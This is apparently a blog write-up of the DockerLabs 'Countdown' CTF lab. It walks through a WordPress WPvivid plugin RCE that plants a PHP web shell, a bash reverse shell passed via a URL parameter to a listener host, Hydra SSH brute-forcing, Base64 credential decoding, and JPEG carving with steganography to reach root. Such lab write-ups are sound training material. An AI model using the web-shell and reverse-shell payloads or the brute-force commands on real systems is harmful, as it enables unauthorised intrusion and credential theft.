Post cover image

June 13, 2026

DockerLabs CTF: Countdown Walkthrough — WPvivid RCE & Advanced Hex File Reconstruction

The transition from structured Capture The Flag (CTF) environments to the unpredictable landscape of live bug bounty hunting — on platforms…

SWALE

5 min read

The transition from structured Capture The Flag (CTF) environments to the unpredictable landscape of live bug bounty hunting — on platforms like HackerOne and YesWeHack — requires a fundamental shift in mindset. You stop looking for deliberate breadcrumbs and start hunting for real-world misconfigurations. However, high-quality labs remain an invaluable proving ground for keeping manual reconnaissance and vulnerability triage skills razor-sharp.

Today, we are tearing down the Countdown machine from DockerLabs. This box stands out because it perfectly mimics a multi-stage attack path. We'll start with the classic exploitation of a vulnerable WordPress plugin (CVE-2026–1357) for initial access, pivot through credential enumeration, and conclude with a heavily manual digital forensics challenge that requires surgical hexadecimal file repair and steganography.

Let's get into the weeds.

Phase 1: Reconnaissance & Enumeration

We kick things off by mapping the target's attack surface using Nmap to discover open ports and running services.

sudo nmap -p- -sS -sV 172.17.0.2
None

The scan reveals two open ports:

  • Port 22 (SSH): Running OpenSSH 9.6p1.
  • Port 80 (HTTP): Running Apache 2.4.58.

Knowing a web server is in play, the next logical step is to enumerate the application layer. Identifying a WordPress installation in the /secret_portal_65hBlEo9OU directory, we utilize WPScan (or similar plugin detection) to aggressively enumerate vulnerable components.

None

The scan successfully identifies the wpvivid-backuprestore plugin running version 0.9.123. A quick search confirms that versions <= 0.9.123 are vulnerable to an authenticated Remote Code Execution (CVE-2026-1357).

Phase 2: Exploitation & Initial Foothold

To weaponize CVE-2026–1357, we need to prepare our attack environment. The exploit leverages a cryptographic fail-open condition (using a null AES key/IV) and requires the phpseclib library to successfully generate the payload.

wget -q https://raw.githubusercontent.com/phpseclib/phpseclib/1.0.20/phpseclib/Crypt/Base.php -O phpseclib/Crypt/Base.php
None

With the library in place, we execute the Python Proof of Concept (PoC) script (that I got in a github for the exploit of the particular identified CVE) against the target portal.

python3 exploit.py -u http://172.17.0.2/secret_portal_65hBlEo9OU -s ls
None

The exploit successfully uploads our malicious PHP web shell (qg3gmie4aiwnyh4hl4pvkwb3.php). The RCE is confirmed by the output of our ls verification command.

To upgrade this to a stable, interactive session, we set up a Netcat listener.

nc -nvlp 1188
None

We then trigger a bash reverse shell by passing the payload directly through the browser via the ?cmd= parameter:

http://172.17.0.2/secret_portal_65hBlEo9OU/wp-content/uploads/qg3gmie4aiwnyh4hl4pvkwb3.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.0.2.15/1188+0>%261'
None

Excellent. Now we've caught the shell as www-datauser.

Phase 3: Lateral Movement

While enumerating the internal file system as www-data, I dug through the web directories and discovered an HTTP request dump stored in a file named copy2321_.php.

cat copy2321_.php
None

The request contained a highly suspicious cookie: session_id=ZXRoYW46cGZMbWVzJFR0HcFJDbUFDVFAK. Recognizing the Base64 signature, I moved the string over to CyberChef. By stripping the non-alphabet characters and decoding it, we extracted a set of credentials: ethan:pfLmWVz2EGKGpRCmACTP.

None

Simultaneously, never one to ignore parallel attack vectors, I had Hydra running in the background to brute-force SSH for the user bond utilizing the standard rockyou.txt wordlist.

hydra -l bond -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -T 64
None

Hydra struck gold before we even needed Ethan's credentials, identifying the SSH password for bond as 999999999. We SSH into the machine and claim our user flag.

ls
cat user.txt
None

User Flag: DL{REDACTED}

Phase 4: Privilege Escalation & Hex Forensics

This is where the challenge moves away from standard web exploitation and tests our digital forensics capabilities. While exploring bond's home directory, we locate a suspicious image file named captura3.jpg. Running basic file enumeration tools immediately raises red flags.

file captura3.jpg
None 
exiftool captura3.jpg
None

The file command simply returns data, and exiftool throws a critical warning: PNG image did not start with IHDR.

Let's dump the hex data to see exactly how this file has been corrupted.

xxd captura3.jpg | head
None

The file begins with a fake PNG header (.PNG...IF....X). However, checking the end of the file tells a different story.

xxd captura3.jpg | tail
None

We can clearly see the valid JPEG End of Image (EOI) marker ff d9. This indicates a valid JPEG is buried inside this corrupted wrapper. To isolate the image, we copy the file and search for the JPEG Start of Frame / Quantization table indicator (ff db).

cp captura3.jpg captura3.bin
xxd captura3.bin | grep -n "ff db"
None

We locate the ff db marker at offset line 6. Using the dd command, we surgically skip the first 18 bytes to strip out the bogus PNG header.

dd if=captura3.bin of=swale.jpg bs=1 skip=18
None

After inspecting the output, an additional 2 bytes need to be skipped to clean the binary structure completely.

dd if=swale.jpg of=swale2.jpg bs=1 skip=2
None

With the garbage data completely removed, the file still requires a valid JPEG Start of Image (SOI) header (ff d8) to render properly. We can manually echo these hex bytes into a new file and append our cleaned binary data to it.

echo -n -e "\xff\xd8" > swale_image_final.jpg
cat swale2.jpg >> swale_image_final.jpg
file swale_image_final.jpg
None

Success! The file command now happily reports: JPEG image data. Opening the image reveals a picture of a bag packed with dynamite—a perfect nod to the "Countdown" theme.

None

Knowing this image is the focal point of our privilege escalation, we check it for hidden steganography data and successfully extract a hidden text file using stegseek.

stegseek swale_image_final.jpg /usr/share/wordlists/rockyou.txt
cat swale_image_final.jpg.out
None None

The output reveals a cipher text: hGRjVqry0tcVYpgvVjzm.

Leveraging dCode's Cipher Identifier toolkit, the string decrypts directly to the root password. We switch users, enter our shiny new password, and grab the final flag.

su root
cd /root/
ls
cat root.txt
None

Finally we got the root flag. Root Flag: DL{REDACTED}

Conclusion

The Countdown machine is a masterclass in why relying solely on automated tools will eventually leave you stuck. While standard enumeration tools like WPScan and Hydra paved the way for our initial foothold, the true test of this box was the privilege escalation. Identifying a corrupted file signature, manually carving out a bogus PNG header via hexadecimal manipulation, and repairing the underlying JPEG magic bytes are exactly the kind of deep-dive manual analysis skills that separate standard triage from advanced vulnerability research.

Whether you are actively grinding on bug bounty targets or just looking to elevate your digital forensics and reverse engineering workflows, Countdown is a phenomenal exercise in connecting the dots.

Keep hunting, and until the next writeup — stay curious.